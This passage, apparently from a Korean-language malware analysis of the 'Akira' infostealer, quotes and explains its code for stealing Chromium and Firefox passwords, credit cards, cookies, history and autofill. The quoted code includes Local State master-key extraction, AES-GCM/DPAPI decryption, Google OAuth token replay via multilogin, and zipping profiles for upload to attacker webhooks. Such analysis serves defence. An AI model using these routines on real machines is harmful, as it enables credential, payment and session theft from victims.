Utils.get_temp_folder()  # e.g., C:\\Windows\\Temp\\DESKTOP-1234\n",[1706,6181,6182],{"class":1708,"line":531},[1706,6183,6184],{},"os.makedirs(client_dir, exist_ok=True)\n",[1706,6186,6187],{"class":1708,"line":2091},[1706,6188,6189],{},"for sub in (\"Passwords\",\"Cookies\",\"CreditCards\",\"History\",\"Autofill\",\"Wallets\"):\n",[1706,6191,6192],{"class":1708,"line":2097},[1706,6193,6194],{},"    os.makedirs(os.path.join(client_dir, sub), exist_ok=True)\n",[630,6196,6197,6204,6207,6210,6213],{},[633,6198,6199,6200],{},"시스템 임시 디렉터리 아래에 피해자의 머신 이름(%TEMP%\\DESKTOP-",[6201,6202,6203],"hostname",{},")을 딴 일회용 스테이징 영역을 생성하여, 유출된 모든 아티팩트가 쉽게 아카이브 가능한 하나의 위치로 통합되도록 합니다.",[633,6205,6206],{},"유형별로 데이터를 격리합니다. 여섯 개의 전용 하위 폴더(Passwords, Cookies, CreditCards, History, Autofill, Wallets)가 이름 충돌을 방지하고 이후 압축을 단순화합니다. 각 추출 루틴은 자신의 폴더에만 기록합니다.",[633,6208,6209],{},"멱등적 디렉터리 생성은 exist_ok=True를 사용하므로, 멀웨어가 재실행되어도(예: 재부팅이나 지속성) 충돌하거나 기존 데이터를 덮어쓰지 않고 새 항목이 동일한 구조에 추가됩니다.",[633,6211,6212],{},"선택적 정리를 용이하게 합니다. 업로드와 알림이 완료되면, 스틸러는 Utils.clear_client_folder()를 호출하여 자신의 작업 공간만 재귀적으로 삭제하고 잔여 파일을 남기지 않을 수 있습니다.",[633,6214,6215],{},"병렬 추출 스레드의 무대를 마련합니다. 모든 대상을 미리 생성해 두면, 브라우저 자격 증명, 쿠키, 자동 완성, 암호화폐 지갑 데이터 등을 수집하는 백그라운드 스레드가 추가 검사 없이 즉시 결과를 기록할 수 있어, 오버헤드를 최소화하고 방어 훅이 예기치 않은 파일 I/O를 탐지할 여지를 줄입니다.",[526,6217,6218],{},[567,6219,6220],{},"2. 지원 브라우저",[630,6222,6223,6265],{},[633,6224,6225,6227],{},[567,6226,6160],{},[630,6228,6229,6232,6235,6238,6241,6244,6247,6250,6253,6256,6259,6262],{},[633,6230,6231],{},"Google Chrome(Stable & SxS)",[633,6233,6234],{},"Microsoft Edge",[633,6236,6237],{},"Brave Browser",[633,6239,6240],{},"Opera & Opera GX",[633,6242,6243],{},"Chromium",[633,6245,6246],{},"Comodo Dragon",[633,6248,6249],{},"Epic Privacy Browser",[633,6251,6252],{},"Iridium Browser",[633,6254,6255],{},"UR Browser",[633,6257,6258],{},"Vivaldi Browser",[633,6260,6261],{},"Yandex Browser",[633,6263,6264],{},"Slimjet, Amigo, Torch, Kometa, Orbitum, CentBrowser, 7Star, Sputnik, Uran",[633,6266,6267,3219,6270,6273,6274,6285,6287,6288,6297,6299,6300,646,6303,6306],{},[567,6268,6269],{},"Firefox 기반",[578,6271,6272],{},"GeckoDriver","를 통해)",[630,6275,6276,6279,6282],{},[633,6277,6278],{},"Mozilla Firefox",[633,6280,6281],{},"Waterfox",[633,6283,6284],{},"Pale Moon",[723,6286],{},"Akira는 환경 변수와 잘 알려진 디렉터리 구조를 사용해 사용자 프로필을 동적으로 찾습니다:",[615,6289,6291],{"className":4515,"code":6290,"language":4517,"meta":530,"style":530},"user_path = os.path.join(os.getenv(\"LOCALAPPDATA\"), \"Google\", \"Chrome\", \"User Data\")\n",[578,6292,6293],{"__ignoreMap":530},[1706,6294,6295],{"class":1708,"line":1709},[1706,6296,6290],{},[723,6298],{},"사용 가능한 브라우저 프로필(예: ",[578,6301,6302],{},"Default",[578,6304,6305],{},"Profile 1"," 등)을 재귀적으로 확인하고 해당 경로 내의 SQLite 데이터베이스를 겨냥합니다.",[888,6308,6310],{"id":6309},"_741-추출되는-데이터-유형","7.4.1 추출되는 데이터 유형",[526,6312,894],{},[1418,6314,4706,6315],{"style":4705},[1434,6316,6317,4706,6330,4706,6343,4706,6356,4706,6368,4706,6380,4706,6391],{},[1424,6318,4711,6319,4711,6323,4711,6327,4706],{},[1427,6320,6322],{"style":6321},"text-align: left; width: 22%;","데이터 유형",[1427,6324,6326],{"style":6325},"text-align: left; width: 28%;","소스 파일",[1427,6328,6329],{"style":4876},"비고",[1424,6331,4711,6332,4711,6335,4711,6340,4706],{},[1439,6333,6334],{},"저장된 암호",[1439,6336,6337,6339],{},[578,6338,584],{},"(Chromium)",[1439,6341,6342],{},"DPAPI 또는 AES-GCM(Chromium v80 이후)를 통해 복호화됨",[1424,6344,4711,6345,4711,6348,4711,6353,4706],{"style":4732},[1439,6346,6347],{},"쿠키",[1439,6349,6350],{},[578,6351,6352],{},"Cookies",[1439,6354,6355],{},"세션 토큰을 포함할 수 있으며, 특히 Google/Facebook 계정의 경우",[1424,6357,4711,6358,4711,6361,4711,6365,4706],{},[1439,6359,6360],{},"자동 완성 데이터",[1439,6362,6363],{},[578,6364,588],{},[1439,6366,6367],{},"주소, 이메일, 전화번호 등",[1424,6369,4711,6370,4711,6373,4711,6377,4706],{"style":4732},[1439,6371,6372],{},"신용카드",[1439,6374,6375],{},[578,6376,588],{},[1439,6378,6379],{},"암호화됨; 마스터 키 필요",[1424,6381,4711,6382,4711,6385,4711,6388,4706],{},[1439,6383,6384],{},"세션 토큰",[1439,6386,6387],{},"메모리 및 쿠키",[1439,6389,6390],{},"Gmail, Google 계정, Discord OAUTH 리플레이 포함",[1424,6392,4711,6393,4711,6396,4711,6404,4706],{"style":4732},[1439,6394,6395],{},"기록 및 URL",[1439,6397,6398,646,6401],{},[578,6399,6400],{},"History",[578,6402,6403],{},"Visited Links",[1439,6405,6406],{},"또한 공격자에게 유출됨",[853,6408],{"className":6409},[856,857],[526,6411,6412,6415],{},[567,6413,6414],{},"3. 추출 모듈","\n멀웨어 제작자가 브라우저를 겨냥할 때, 그들의 주된 보물창고는 Chrome, Firefox 및 그 계열이 자격 증명, 쿠키, 기록, 자동 완성 항목을 저장하는 다양한 SQLite 데이터베이스입니다. astor.py는 경량 Python과 네이티브 API를 엮어 흔적을 남기지 않고 모든 데이터를 체계적으로 뽑아내며, 심지어 라이브 OAuth 세션을 리플레이하기까지 합니다. 아래는 코드를 그대로 인용한, 모듈별 심층 안내입니다.",[888,6417,6419,6420,2040],{"id":6418},"_742-암호-덤퍼chromiumgetpasswords","7.4.2 암호 덤퍼(",[578,6421,6422],{},"Chromium.GetPasswords",[526,6424,894],{},[526,6426,6427],{},"이 모듈은 모든 Chromium 기반 브라우저 프로필을 체계적으로 검색하여 저장된 로그인 자격 증명을 추출합니다. Login Data SQLite 데이터베이스를 겨냥하여 사용자명과 암호화된 암호를 회수한 뒤, 플랫폼의 암호화 키(DPAPI 또는 AES-GCM을 통해 회수)를 사용해 이를 평문으로 복호화합니다. 이 자격 증명은 침해 후 피벗팅이나 계정 탈취에 매우 가치가 높습니다.",[615,6429,6431],{"className":4515,"code":6430,"language":4517,"meta":530,"style":530},"for root, _, files in os.walk(self.BrowserPath):\n    for file in files:\n        if file.lower() == \"login data\":\n            # Copy DB → open → extract rows\n            results = cursor.execute(\n                \"SELECT origin_url, username_value, password_value FROM logins\"\n            ).fetchall()\n            for url, user, pwd_blob in results:\n                clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n                passwords.append((url, user, clear_pwd))\n",[578,6432,6433,6438,6443,6448,6453,6458,6463,6468,6473,6478],{"__ignoreMap":530},[1706,6434,6435],{"class":1708,"line":1709},[1706,6436,6437],{},"for root, _, files in os.walk(self.BrowserPath):\n",[1706,6439,6440],{"class":1708,"line":531},[1706,6441,6442],{},"    for file in files:\n",[1706,6444,6445],{"class":1708,"line":2091},[1706,6446,6447],{},"        if file.lower() == \"login data\":\n",[1706,6449,6450],{"class":1708,"line":2097},[1706,6451,6452],{},"            # Copy DB → open → extract rows\n",[1706,6454,6455],{"class":1708,"line":2419},[1706,6456,6457],{},"            results = cursor.execute(\n",[1706,6459,6460],{"class":1708,"line":2425},[1706,6461,6462],{},"                \"SELECT origin_url, username_value, password_value FROM logins\"\n",[1706,6464,6465],{"class":1708,"line":3081},[1706,6466,6467],{},"            ).fetchall()\n",[1706,6469,6470],{"class":1708,"line":3874},[1706,6471,6472],{},"            for url, user, pwd_blob in results:\n",[1706,6474,6475],{"class":1708,"line":3880},[1706,6476,6477],{},"                clear_pwd = self.Decrypt(pwd_blob, encryptionKey)\n",[1706,6479,6480],{"class":1708,"line":4129},[1706,6481,6482],{},"                passwords.append((url, user, clear_pwd))\n",[630,6484,6485,6498,6504,6512,6530],{},[633,6486,6487,6488,6491,6492,6494,6495,2147],{},"브라우저의 ",[578,6489,6490],{},"User Data"," 폴더 아래 모든 ",[578,6493,584],{}," SQLite 데이터베이스를 ",[567,6496,6497],{},"찾습니다",[633,6499,6500,6501,2147],{},"브라우저 잠금을 피하기 위해 임시 파일로 ",[567,6502,6503],{},"복사합니다",[633,6505,6506,1001,6509,2147],{},[567,6507,6508],{},"SQL 쿼리",[578,6510,6511],{},"SELECT origin_url, username_value, password_value FROM logins",[633,6513,6514,6515,6518,6519,6522,6523,6526,6527,2147],{},"각 ",[578,6516,6517],{},"password_value"," 블롭을 AES-GCM(",[578,6520,6521],{},"v10","/",[578,6524,6525],{},"v11",") 또는 Windows DPAPI 대체를 통해 ",[567,6528,6529],{},"복호화합니다",[633,6531,6532,6533,6536,6537,2147],{},"출력을 ",[578,6534,6535],{},"Passwords/\u003CBrowserName> Passwords.txt","에 ",[567,6538,6539],{},"기록합니다",[888,6541,6543,6544,2040],{"id":6542},"_743-신용카드-덤퍼chromiumgetcreditcards","7.4.3 신용카드 덤퍼(",[578,6545,6546],{},"Chromium.GetCreditCards",[526,6548,894],{},[526,6550,6551],{},"여기서 스틸러는 각 브라우저 프로필의 Web Data 파일에서 저장된 신용카드 데이터에 접근합니다. 만료 정보와 암호화된 신용카드 번호를 추출하는 데 초점을 맞추며, 이후 암호와 동일한 로직으로 복호화됩니다. CVV 코드는 일반적으로 저장되지 않지만, 복구된 정보는 여전히 카드 비대면(card-not-present) 사기에 악용될 수 있습니다.",[615,6553,6555],{"className":4515,"code":6554,"language":4517,"meta":530,"style":530},"results = cursor.execute(\n    \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n).fetchall()\nfor month, year, enc_cc in results:\n    cc_number = self.Decrypt(enc_cc, encryptionKey)\n    ccs.append((cc_number, month, year))\n",[578,6556,6557,6562,6567,6572,6577,6582],{"__ignoreMap":530},[1706,6558,6559],{"class":1708,"line":1709},[1706,6560,6561],{},"results = cursor.execute(\n",[1706,6563,6564],{"class":1708,"line":531},[1706,6565,6566],{},"    \"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards\"\n",[1706,6568,6569],{"class":1708,"line":2091},[1706,6570,6571],{},").fetchall()\n",[1706,6573,6574],{"class":1708,"line":2097},[1706,6575,6576],{},"for month, year, enc_cc in results:\n",[1706,6578,6579],{"class":1708,"line":2419},[1706,6580,6581],{},"    cc_number = self.Decrypt(enc_cc, encryptionKey)\n",[1706,6583,6584],{"class":1708,"line":2425},[1706,6585,6586],{},"    ccs.append((cc_number, month, year))\n",[630,6588,6589,6598,6605,6613],{},[633,6590,6591,6592,6594,6595,2147],{},"각 프로필 아래의 ",[578,6593,588],{}," SQLite 저장소를 ",[567,6596,6597],{},"겨냥합니다",[633,6599,6600,1001,6602,2147],{},[567,6601,6508],{},[578,6603,6604],{},"SELECT expiration_month, expiration_year, card_number_encrypted FROM credit_cards",[633,6606,6607,6610,6611,2147],{},[578,6608,6609],{},"card_number_encrypted","를 암호 블롭과 정확히 동일하게 ",[567,6612,6529],{},[633,6614,6615,6618,6619,2147],{},[578,6616,6617],{},"CreditCards/\u003CBrowserName> CreditCards.txt","로 ",[567,6620,6621],{},"출력합니다",[888,6623,6625,6626,2040],{"id":6624},"_744-쿠키-덤퍼chromiumgetcookies","7.4.4 쿠키 덤퍼(",[578,6627,6628],{},"Chromium.GetCookies",[526,6630,894],{},[526,6632,6633],{},"쿠키, 특히 세션 쿠키는 암호 없이 계정을 하이재킹하는 데 최우선 표적입니다. 이 모듈은 프로필 전반의 모든 쿠키 파일을 덤프하고, 복호화하며, 도메인, 이름, 만료 같은 필수 메타데이터를 수집합니다. 지문 채취와 결합하면, 이 쿠키들은 인증된 서비스에 대한 원활한 리플레이 공격을 가능하게 할 수 있습니다.",[615,6635,6637],{"className":4515,"code":6636,"language":4517,"meta":530,"style":530},"results = cursor.execute(\n    \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n).fetchall()\nfor host, name, path, blob, expiry in results:\n    cookie_val = self.Decrypt(blob, encryptionKey)\n    cookies.append((host, name, path, cookie_val, expiry))\n",[578,6638,6639,6643,6648,6652,6657,6662],{"__ignoreMap":530},[1706,6640,6641],{"class":1708,"line":1709},[1706,6642,6561],{},[1706,6644,6645],{"class":1708,"line":531},[1706,6646,6647],{},"    \"SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies\"\n",[1706,6649,6650],{"class":1708,"line":2091},[1706,6651,6571],{},[1706,6653,6654],{"class":1708,"line":2097},[1706,6655,6656],{},"for host, name, path, blob, expiry in results:\n",[1706,6658,6659],{"class":1708,"line":2419},[1706,6660,6661],{},"    cookie_val = self.Decrypt(blob, encryptionKey)\n",[1706,6663,6664],{"class":1708,"line":2425},[1706,6665,6666],{},"    cookies.append((host, name, path, cookie_val, expiry))\n",[630,6668,6669,6677,6686,6696],{},[633,6670,6671,6672,6494,6674,2147],{},"모든 ",[578,6673,6352],{},[567,6675,6676],{},"스캔합니다",[633,6678,6679,6682,6683,2147],{},[578,6680,6681],{},"host_key, name, path, encrypted_value, expires_utc","를 ",[567,6684,6685],{},"선택합니다",[633,6687,6514,6688,6691,6692,6695],{},[578,6689,6690],{},"encrypted_value"," 블롭을 ",[567,6693,6694],{},"복호화하여"," 실제 쿠키 문자열을 드러냅니다.",[633,6697,6698,6536,6701,2147],{},[578,6699,6700],{},"Cookies/\u003CBrowserName> Cookies.txt",[567,6702,6703],{},"저장합니다",[888,6705,6707,6708,2040],{"id":6706},"_745-google-세션-덤퍼chromiumdump_google_sessions","7.4.5 Google 세션 덤퍼(",[578,6709,6710],{},"Chromium.dump_google_sessions",[526,6712,894],{},[526,6714,6715],{},"더 발전된 구성 요소 중 하나인 이 루틴은 token_service 테이블에서 저장된 OAuth 토큰을 복호화합니다. Google의 multilogin 엔드포인트를 통해 이를 리플레이함으로써, 멀웨어는 활성 세션 쿠키를 재생성할 수 있어 공격자가 자격 증명 없이 Google 계정을 하이재킹할 수 있게 합니다. 이는 현대 스틸러에서 액세스 토큰이 어떻게 최우선 표적이 되었는지를 잘 보여 줍니다.",[615,6717,6719],{"className":4515,"code":6718,"language":4517,"meta":530,"style":530},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\nfor service, blob in cursor.fetchall():\n    iv = blob[3:15]\n    ciphertext = blob[15:-16]\n    cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n    token = cipher.decrypt(ciphertext).decode()\n    # Replays via POST to OAuth endpoint\n    response = requests.post(\n        \"https://accounts.google.com/oauth/multilogin\",\n        headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n        data={\"source\": \"com.google.Drive\"}\n    )\n    save each account’s cookies to file\n",[578,6720,6721,6726,6731,6736,6741,6746,6751,6756,6761,6766,6771,6776,6780],{"__ignoreMap":530},[1706,6722,6723],{"class":1708,"line":1709},[1706,6724,6725],{},"cursor.execute(\"SELECT service, encrypted_token FROM token_service\")\n",[1706,6727,6728],{"class":1708,"line":531},[1706,6729,6730],{},"for service, blob in cursor.fetchall():\n",[1706,6732,6733],{"class":1708,"line":2091},[1706,6734,6735],{},"    iv = blob[3:15]\n",[1706,6737,6738],{"class":1708,"line":2097},[1706,6739,6740],{},"    ciphertext = blob[15:-16]\n",[1706,6742,6743],{"class":1708,"line":2419},[1706,6744,6745],{},"    cipher = AES.new(secret_key, AES.MODE_GCM, iv)\n",[1706,6747,6748],{"class":1708,"line":2425},[1706,6749,6750],{},"    token = cipher.decrypt(ciphertext).decode()\n",[1706,6752,6753],{"class":1708,"line":3081},[1706,6754,6755],{},"    # Replays via POST to OAuth endpoint\n",[1706,6757,6758],{"class":1708,"line":3874},[1706,6759,6760],{},"    response = requests.post(\n",[1706,6762,6763],{"class":1708,"line":3880},[1706,6764,6765],{},"        \"https://accounts.google.com/oauth/multilogin\",\n",[1706,6767,6768],{"class":1708,"line":4129},[1706,6769,6770],{},"        headers={\"Authorization\": f\"MultiBearer {token}:{service_id}\"},\n",[1706,6772,6773],{"class":1708,"line":5054},[1706,6774,6775],{},"        data={\"source\": \"com.google.Drive\"}\n",[1706,6777,6778],{"class":1708,"line":5060},[1706,6779,5984],{},[1706,6781,6782],{"class":1708,"line":5066},[1706,6783,6784],{},"    save each account’s cookies to file\n",[630,6786,6787,6803,6812,6823],{},[633,6788,6789,6791,6792,6795,6796,6799,6800,2147],{},[578,6790,588],{}," 복제본에서 ",[578,6793,6794],{},"service","와 원시 ",[578,6797,6798],{},"encrypted_token","을 ",[567,6801,6802],{},"가져옵니다",[633,6804,6487,6805,6808,6809,2147],{},[578,6806,6807],{},"Local State"," 키를 사용한 ",[567,6810,6811],{},"AES-GCM 복호화",[633,6813,6814,6815,6818,6819,6822],{},"복호화된 토큰을 Google의 ",[578,6816,6817],{},"multilogin"," API에 POST로 ",[567,6820,6821],{},"리플레이하여"," 유효한 OAuth 쿠키를 재구성합니다.",[633,6824,6825,6828,6829,2147],{},[578,6826,6827],{},"Cookies/\u003Cdisplay_email> Google Session.txt"," 아래에 계정별 세션 파일을 ",[567,6830,6539],{},[888,6832,6834,6835,2040],{"id":6833},"_746-기록-덤퍼chromiumgethistory","7.4.6 기록 덤퍼(",[578,6836,6837],{},"Chromium.GetHistory",[526,6839,894],{},[526,6841,6842],{},"이 함수는 URL, 제목, 방문 빈도를 포함한 브라우징 기록 항목을 추출합니다. 프라이버시 침해를 넘어, 이 데이터는 공격자가 피해자의 행동을 이해하고, 고가치 표적(예: 뱅킹 포털)을 식별하거나, 소셜 엔지니어링 페이로드를 맞춤화하는 데 도움을 줍니다.",[615,6844,6846],{"className":4515,"code":6845,"language":4517,"meta":530,"style":530},"results = cursor.execute(\n    \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n).fetchall()\nhistory.sort(key=lambda x: x[3], reverse=True)\nreturn [(url, title, count) for url, title, count, _ in history]\n",[578,6847,6848,6852,6857,6861,6866],{"__ignoreMap":530},[1706,6849,6850],{"class":1708,"line":1709},[1706,6851,6561],{},[1706,6853,6854],{"class":1708,"line":531},[1706,6855,6856],{},"    \"SELECT url, title, visit_count, last_visit_time FROM urls\"\n",[1706,6858,6859],{"class":1708,"line":2091},[1706,6860,6571],{},[1706,6862,6863],{"class":1708,"line":2097},[1706,6864,6865],{},"history.sort(key=lambda x: x[3], reverse=True)\n",[1706,6867,6868],{"class":1708,"line":2419},[1706,6869,6870],{},"return [(url, title, count) for url, title, count, _ in history]\n",[630,6872,6873,6883,6893],{},[633,6874,6671,6875,6877,6878,6799,6881,2147],{},[578,6876,6400],{}," DB에서 ",[578,6879,6880],{},"url, title, visit_count, last_visit_time",[567,6882,6685],{},[633,6884,6885,6886,6889,6890,2147],{},"항목을 ",[578,6887,6888],{},"last_visit_time"," 내림차순으로 ",[567,6891,6892],{},"정렬합니다",[633,6894,6895,6618,6898,2147],{},[578,6896,6897],{},"History/\u003CBrowserName> History.txt",[567,6899,6621],{},[888,6901,6903,6904,2040],{"id":6902},"_747-자동-완성-덤퍼chromiumgetautofills","7.4.7 자동 완성 덤퍼(",[578,6905,6906],{},"Chromium.GetAutofills",[526,6908,894],{},[526,6910,6911],{},"주소, 이름, 이메일, 때로는 결제 관련 데이터 같은 자동 완성 항목은 브라우저의 Web Data 저장소에서 긁어옵니다. 이 값들은 중요해 보이지 않을 수 있지만, 집계하면 피해자의 정체성과 행동에 대한 풍부한 프로필을 제공합니다.",[615,6913,6915],{"className":4515,"code":6914,"language":4517,"meta":530,"style":530},"results = cursor.execute(\n    \"SELECT name, value FROM autofill\"\n).fetchall()\nfor field, value in results:\n    autofills.append((field.strip(), value.strip()))\n",[578,6916,6917,6921,6926,6930,6935],{"__ignoreMap":530},[1706,6918,6919],{"class":1708,"line":1709},[1706,6920,6561],{},[1706,6922,6923],{"class":1708,"line":531},[1706,6924,6925],{},"    \"SELECT name, value FROM autofill\"\n",[1706,6927,6928],{"class":1708,"line":2091},[1706,6929,6571],{},[1706,6931,6932],{"class":1708,"line":2097},[1706,6933,6934],{},"for field, value in results:\n",[1706,6936,6937],{"class":1708,"line":2419},[1706,6938,6939],{},"    autofills.append((field.strip(), value.strip()))\n",[630,6941,6942,6953],{},[633,6943,6944,6947,6948,6682,6951,2147],{},[578,6945,6946],{},"web data"," 파일에서 폼 채우기 항목 ",[578,6949,6950],{},"name, value",[567,6952,6802],{},[633,6954,6955,6618,6958,2147],{},[578,6956,6957],{},"Autofill/\u003CBrowserName> Autofill.txt",[567,6959,6539],{},[888,6961,6963,6964,6966,6967,2040],{"id":6962},"_748-firefox-프로필-그래버geckodriver-grabfirefoxprofiles","7.4.8 Firefox 프로필 그래버(",[578,6965,6272],{}," & ",[578,6968,6969],{},"grabFirefoxProfiles",[526,6971,894],{},[526,6973,6974],{},"세분화된 Chromium 루틴과 달리, 이 함수는 광범위한 접근을 택합니다. 저장된 로그인, 쿠키, 북마크를 포함한 전체 Firefox 프로필 디렉터리를 압축하여 통째로 유출합니다. 이는 공격자가 알려진 NSS 도구로 복호화 장벽을 우회하며 오프라인에서 데이터를 분석하거나 추출할 수 있게 합니다.",[615,6976,6978],{"className":4515,"code":6977,"language":4517,"meta":530,"style":530},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n    for root, dirs, files in os.walk(source_path):\n        zipf.write(each file)\n# Upload via GoFile/File.io, then POST via attacker webhooks\n",[578,6979,6980,6985,6990,6995],{"__ignoreMap":530},[1706,6981,6982],{"class":1708,"line":1709},[1706,6983,6984],{},"with zipfile.ZipFile(zip_path, 'w') as zipf:\n",[1706,6986,6987],{"class":1708,"line":531},[1706,6988,6989],{},"    for root, dirs, files in os.walk(source_path):\n",[1706,6991,6992],{"class":1708,"line":2091},[1706,6993,6994],{},"        zipf.write(each file)\n",[1706,6996,6997],{"class":1708,"line":2097},[1706,6998,6999],{},"# Upload via GoFile/File.io, then POST via attacker webhooks\n",[630,7001,7002,7012,7023],{},[633,7003,7004,7005,7008,7009,2147],{},"전체 ",[578,7006,7007],{},"%APPDATA%\\Mozilla\\Firefox\\Profiles"," 디렉터리를 ",[567,7010,7011],{},"압축합니다",[633,7013,7014,7015,7018,7019,7022],{},"이를 ",[578,7016,7017],{},"%TEMP%\\\u003CComputerName>_Firefox_profiles.zip","으로 ",[567,7020,7021],{},"명명하고"," 동일한 웹훅 채널로 다운로드 링크를 전송합니다.",[633,7024,7025,7028,7029,646,7032,646,7035,7038],{},[567,7026,7027],{},"또한"," 이미 존재하는 NSS 복호화 루틴을 사용해 각 Firefox 프로필에 대해 동일한 SQLite 기반 추출 함수(",[578,7030,7031],{},"logins.json",[578,7033,7034],{},"cookies.sqlite",[578,7036,7037],{},"places.sqlite",")를 호출합니다.",[888,7040,7042],{"id":7041},"_749-추출-요약","7.4.9 추출 요약",[526,7044,894],{},[526,7046,7047,7048,646,7050,646,7052,646,7054,646,7056,7059,7060,7063,7064,7066,7067,646,7069,646,7071,7073,7074,7077],{},"Astor.py는 Chromium 기반 및 Firefox 클라이언트 전반에서 모든 자격 증명과 세션 아티팩트를 체계적으로 수집하여 포괄적인 브라우저 침해를 오케스트레이션합니다. 각 SQLite 저장소(",[578,7049,584],{},[578,7051,588],{},[578,7053,6352],{},[578,7055,6400],{},[578,7057,7058],{},"autofill",")를 찾아 안전하게 복사한 뒤, 표적 SQL 쿼리를 실행하여 URL, 사용자명, 암호, 신용카드 정보, 쿠키, 브라우징 기록, 폼 채우기 항목을 추출합니다. 암호와 결제 데이터는 AES-GCM(또는 Windows DPAPI 대체)을 통해 복호화되며, 쿠키도 마찬가지로 풀려 평문 값을 드러냅니다. Google 계정의 경우, ",[578,7061,7062],{},"token_service","에서 나온 암호화된 OAuth 토큰이 복호화되어 ",[578,7065,6817],{}," API에 리플레이되어 라이브 세션 쿠키를 재생성합니다. 마지막으로 Firefox 프로필은 통째로 아카이브되어(",[578,7068,7031],{},[578,7070,7034],{},[578,7072,7037],{}," 포함) ZIP으로 전달되며, 어떤 아티팩트도 남기지 않습니다. 이 엔드투엔드 파이프라인은 ",[578,7075,7076],{},"%TEMP%\\\u003CComputerName>"," 아래에서 조용히 실행되며, 모든 데이터 범주에 대해 깔끔하게 정리된 출력 파일을 생성합니다.",[740,7079,7081],{"id":7080},"_75-복호화-로직","7.5 복호화 로직",[526,7083,746],{},[526,7085,7086],{},"Chrome이나 Edge 같은 현대 브라우저는 암호, 쿠키, 신용카드 정보 같은 민감 데이터를 로컬에 저장하기 전에 암호화합니다. Akira에는 레거시와 현재의 Chromium 암호화 방식을 모두 처리하도록 맞춤화된 내장 복호화 루틴이 포함되어 있습니다. 이는 시스템의 패치 수준이나 브라우저 버전과 무관하게 평문 데이터를 추출할 수 있도록 보장합니다.",[526,7088,7089],{},"이 과정의 핵심은 Local State라는 파일에 저장된 브라우저의 마스터 암호화 키를 추출하고 복호화하는 것입니다. 브라우저 버전과 Windows 빌드에 따라, Akira는 적절한 복호화 방법을 동적으로 선택합니다:",[526,7091,7092],{},"DPAPI(Data Protection API)는 오래된 시스템에서 사용되며, Chrome이 현재 사용자의 Windows 자격 증명으로 보호되는 비밀을 저장하는 방식입니다.",[526,7094,7095],{},"AES-GCM은 현대 Chromium 빌드에서 사용되며, 무작위로 생성된 마스터 키 자체가 DPAPI로 암호화된 뒤, 사용자 데이터의 앱 내 암호화에 사용됩니다.",[526,7097,7098],{},"Local State 마스터 키를 먼저 복호화함으로써, Akira는 모든 브라우저 비밀을 잠금 해제할 수 있는 능력을 얻고, 자격 증명, 토큰, 쿠키 등을 추출하는 길을 엽니다.",[526,7100,7101],{},[567,7102,7103],{},"키 추출",[615,7105,7107],{"className":4515,"code":7106,"language":4517,"meta":530,"style":530},"local_state_path = os.path.join(user_path, \"Local State\")\nwith open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n    local_state = json.load(f)\nmaster_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[578,7108,7109,7114,7119,7124],{"__ignoreMap":530},[1706,7110,7111],{"class":1708,"line":1709},[1706,7112,7113],{},"local_state_path = os.path.join(user_path, \"Local State\")\n",[1706,7115,7116],{"class":1708,"line":531},[1706,7117,7118],{},"with open(local_state_path, \"r\", encoding=\"utf-8\") as f:\n",[1706,7120,7121],{"class":1708,"line":2091},[1706,7122,7123],{},"    local_state = json.load(f)\n",[1706,7125,7126],{"class":1708,"line":2097},[1706,7127,7128],{},"master_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n",[526,7130,7131],{},[567,7132,7133],{},"복호화(AES-GCM):",[615,7135,7137],{"className":4515,"code":7136,"language":4517,"meta":530,"style":530},"nonce = value[3:15]\nciphertext = value[15:-16]\ntag = value[-16:]\ncipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\ndecrypted = cipher.decrypt_and_verify(ciphertext, tag)\n",[578,7138,7139,7144,7149,7154,7159],{"__ignoreMap":530},[1706,7140,7141],{"class":1708,"line":1709},[1706,7142,7143],{},"nonce = value[3:15]\n",[1706,7145,7146],{"class":1708,"line":531},[1706,7147,7148],{},"ciphertext = value[15:-16]\n",[1706,7150,7151],{"class":1708,"line":2091},[1706,7152,7153],{},"tag = value[-16:]\n",[1706,7155,7156],{"class":1708,"line":2097},[1706,7157,7158],{},"cipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\n",[1706,7160,7161],{"class":1708,"line":2419},[1706,7162,7163],{},"decrypted = cipher.decrypt_and_verify(ciphertext, tag)\n",[526,7165,7166,7167,7170],{},"DPAPI로의 대체가 필요한 경우(오래된 시스템에서), ",[578,7168,7169],{},"win32crypt.CryptUnprotectData()","를 사용합니다.",[526,7172,7173,7179],{},[567,7174,7175,7178],{},[578,7176,7177],{},"decrypt_password_blob"," 설명:","\n이 함수는 Akira Stealer가 Chromium 기반 브라우저에서 저장된 각 암호 값을 어떻게 복호화하는지 보여 줍니다. 두 가지 경우를 처리합니다:",[2105,7181,7182,7192],{},[633,7183,7184,7187,7188,7191],{},[567,7185,7186],{},"Windows DPAPI 블롭","(오래되었거나 GCM으로 암호화되지 않은 데이터): 사용자의 Windows 자격 증명을 사용해 복호화하는 시스템 호출 ",[578,7189,7190],{},"CryptUnprotectData","로 되돌아갑니다.",[633,7193,7194,7197,7198,7201],{},[567,7195,7196],{},"AES-GCM 암호화 블롭","(Chrome v10/v11 형식): 버전 헤더를 파싱하고, IV와 인증 태그를 추출하며, ",[578,7199,7200],{},"cryptography"," 라이브러리를 사용해 페이로드를 안전하게 복호화합니다.",[615,7203,7205],{"className":4515,"code":7204,"language":4517,"meta":530,"style":530},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\n\n\ndef decrypt_password_blob(buffer: bytes, key: bytes) -> str:\n    \"\"\"\n    Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n\n    Parameters:\n    - buffer: raw encrypted blob from the `password_value` field\n    - key: the master AES key retrieved via DPAPI from Local State\n\n    Returns:\n    - Decrypted UTF-8 plaintext password\n    \"\"\"\n    # 1) DPAPI fallback for non-AES-GCM blobs\n    if not buffer.startswith((b'v10', b'v11')):\n        # Uses Windows 